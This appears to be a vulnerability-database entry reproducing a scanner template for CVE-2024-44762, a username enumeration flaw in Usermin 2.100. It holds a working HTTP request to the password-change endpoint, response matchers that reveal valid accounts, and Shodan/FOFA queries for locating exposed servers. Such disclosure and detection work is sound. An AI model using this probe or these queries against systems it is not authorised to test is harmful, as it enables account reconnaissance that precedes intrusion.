漏洞描述
Usermin version 2.100 and below is susceptible to username enumeration via the password change functionality. An attacker can determine valid usernames by analyzing the response messages from the password change endpoint.
CVE-2024-44762: Usermin 2.100 - Username Enumeration
PoC代码[已公开]
id: CVE-2024-44762
info:
name: Usermin 2.100 - Username Enumeration
author: ritikchaddha
severity: medium
description: |
Usermin version 2.100 and below is susceptible to username enumeration via the password change functionality. An attacker can determine valid usernames by analyzing the response messages from the password change endpoint.
remediation: |
Upgrade to the latest version of Usermin that addresses this vulnerability.
reference:
- https://www.exploit-db.com/exploits/52254
- https://www.webmin.com/usermin.html
- https://senscybersecurity.nl/cve-2024-44762-explained/
- https://nvd.nist.gov/vuln/detail/CVE-2024-44762
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-44762
cwe-id: CWE-209
epss-score: 0.24733
epss-percentile: 0.95952
metadata:
verified: true
max-request: 1
vendor: webmin
product: usermin
shodan-query: title:"Usermin"
fofa-query: app="Usermin"
tags: cve,cve2024,usermin,webmin,exposure,usernames
http:
- raw:
- |
POST /password_change.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/password_change.cgi
user=admin&pam=&expired=2&old=fakePassword&new1=password&new2=password
matchers:
- type: word
part: body
words:
- "Failed to change password: The current password is incorrect"
- "Your login name was not found in the password file"
condition: or
# digest: 490a0046304402202ff6517fb7f65d0868efaa2fbb137fac63cb87ae19fda39c1b8ecde7bb112a8f02201bfe36c520fd3796a08ae4df014a212730193ba36ef70fda9870cbf3407120fa:922c64590222798bb761d5b6d8e72950